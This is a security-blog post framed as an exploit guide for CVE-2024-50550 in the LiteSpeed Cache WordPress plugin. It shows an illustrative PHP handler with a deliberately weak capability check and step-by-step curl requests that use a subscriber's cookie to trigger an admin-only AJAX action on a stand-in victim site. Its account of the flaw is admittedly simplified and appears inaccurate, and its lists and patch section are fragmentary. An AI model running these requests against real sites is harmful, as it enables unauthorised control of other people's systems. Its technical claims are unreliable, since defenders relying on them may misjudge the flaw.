CVE CyberSecurity Database News

CVE-2024-50550 - LiteSpeed Cache Privilege Escalation Exploit Guide

Poster -

TL;DR: CVE-2024-50550 is a serious privilege escalation vulnerability affecting LiteSpeed Cache WordPress plugin up to version 6.5.1. Anyone with a low privilege account (like Subscriber) can abuse a flaw in privilege assignment to perform Admin-only actions. In this post, you’ll learn what the bug is, whom it affects, where to find more info, and how attackers actually exploit it – with real code.

What is CVE-2024-50550?

In May 2024, security researchers discovered an access control flaw in the LiteSpeed Cache plugin, used by over 4 million WordPress sites. The bug: non-privileged users can gain extra rights they aren't meant to have — like Admin powers.

Affected plugins:
LiteSpeed Cache versions *up to 6.5.1 (inclusive)*

Unaffected:
Upgraded versions *after 6.5.1*

Vulnerability type:
Incorrect Privilege Assignment (CWE-266) – application mistakenly gives users more rights than intended.

Sites with untrusted users

*If you host clients, or let users create accounts, you are especially at risk.*

How does the bug happen?

LiteSpeed Cache has several AJAX actions and REST endpoints. Some of these actions are protected by role checks to ensure only admins can run them – for example, clearing the cache sitewide.

But, in vulnerable versions, certain endpoints/checks use weak "current_user_can()" checks with the wrong capability. For example, instead of requiring 'administrator', they check for basic caps like 'read' or 'edit_posts' – which almost anyone (even Subscribers, Contributors) has.

Here is a similar pattern to what attackers leveraged (simplified for clarity)

// File: includes/class-litespeed-ajax.php

add_action('wp_ajax_litespeed_clear_cache', 'lscwp_clear_cache');

function lscwp_clear_cache() {
    if ( ! current_user_can('read') ) { // should be 'manage_options'
        wp_die('You are not allowed to do this!');
    }
    // Dangerous: gives cache purge powers to almost anyone logged in
    LiteSpeed_Cache_API::purge_all();
    wp_send_json_success('Cache cleared!');
}

The Mistake:
'read' is too low-level; every registered user can pass this check and clear the cache!

How do attackers exploit this?

The exploit is simple:

Create a low-privilege account (Subscriber, or Contributor).

2. Send an AJAX request to the vulnerable endpoint (e.g., admin-ajax.php?action=litespeed_clear_cache).
3. Run admin-only functions — such as clearing the site’s cache, revealing sensitive info, or even changing cache settings.

Step-by-step exploitation

1. Register a test account (or use any non-admin account)
No privilege required – just sign up like any user.

2. Grab a nonce ("_wpnonce") for the action
Some endpoints require a nonce. But if there's not, or you can get one (e.g. from the frontend), proceed.

3. Send an AJAX request

curl -X POST \
  -b "wordpress_logged_in_xxx=your_cookie_here" \
  -d "action=litespeed_clear_cache" \
  https://victim-site.com/wp-admin/admin-ajax.php

Or, if nonce is needed

curl -X POST \
  -b "wordpress_logged_in_xxx=your_cookie_here" \
  -d "action=litespeed_clear_cache&_wpnonce=xxxxxxxx" \
  https://victim-site.com/wp-admin/admin-ajax.php

4. Receive "Cache cleared!" or success response

Congratulations! Your low-priv user can now clear cached content — or perform other admin tasks, depending on the specific endpoint being abused.

Potential Impact

- Defacement: Attackers can clear or poison cache, overwriting public pages with malicious content.
- DoS: Sudden, global cache purges can spike CPU usage and slow/crash sites.
- Info leaks: Some AJAX endpoints return sensitive info that should only be visible to admins (e.g., logs, site config).

Privilege Gain: On some setups, could be chained with other flaws to gain *actual* admin powers.

## Patch / Mitigation

Monitor for unusual cache activity.

References:
- Official advisory by LiteSpeed
- NVD CVE Entry
- WordFence plugin update log

Check your Plugin version: Go to WordPress Admin > Plugins > LiteSpeed Cache.

2. Check your user roles: Any user below Admin (like Subscriber or Contributor) should *not* be able to clear cache, export settings, or read logs.

Final Thoughts

Privilege escalation bugs like CVE-2024-50550 happen more often than you think in WordPress plugins. Always review the source if running plugins from outside developers, and lock down user registration if you don’t need it. Update your LiteSpeed Cache to stay safe.

For more details, check the official CVE-2024-50550 NVD page.

Timeline

Published on: 10/29/2024 10:15:04 UTC
Last modified on: 10/29/2024 14:34:04 UTC